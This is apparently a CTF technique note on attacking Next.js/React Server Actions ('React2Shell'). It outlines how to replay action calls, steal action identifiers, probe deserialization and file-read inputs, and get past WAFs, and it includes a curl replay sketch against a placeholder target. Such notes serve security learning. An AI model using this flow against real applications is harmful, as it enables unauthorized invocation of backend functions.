Note

web javascript nextjs react-server-actions rsc deserialization

Replay Server Action calls out of band to reach callable backend functions when IDs, serialization, and WAF behavior line up.

Next.js / React Server Actions / React2Shell

Server Actions create a structured server-call surface that looks opaque at first, but can expose callable backend functions if IDs, serialization, and WAF behavior line up.

Why It Matters

Action endpoints can be replayed directly, turning hidden backend functions into a reachable attack surface.

Vulnerable Pattern

Next.js apps exposing Next-Action, text/x-component, or React Server Component traffic that can be replayed out of band.

Exploit Flow

Fingerprint whether the target really uses Server Actions and whether requests can be replayed with curl.
Enumerate or steal action identifiers from HTML, RSC responses, or bundles.
Test deserialization edge cases, file-read arguments, or gadgetized object graphs if the action accepts structured input.

Variations

react2shell, raw action replays, RSC boundary confusion, or WAF bypasses allowing payloads only in specific encodings.

Common Blockers

Action IDs bound to build versions or sessions, CSRF defenses, and WAFs blocking obvious serialized payload markers.

PoC Sketch

curl https://target/action \
  -H 'Next-Action: <action-id>' \
  -H 'Content-Type: text/plain;charset=UTF-8' \
  --data '[]'

Good Situations To Use It

A Next.js app exposes Server Action traffic.
Action IDs are recoverable and replayable.
Actions accept structured/serialized input.

Sources

ehaxctf2026/web/flight_risk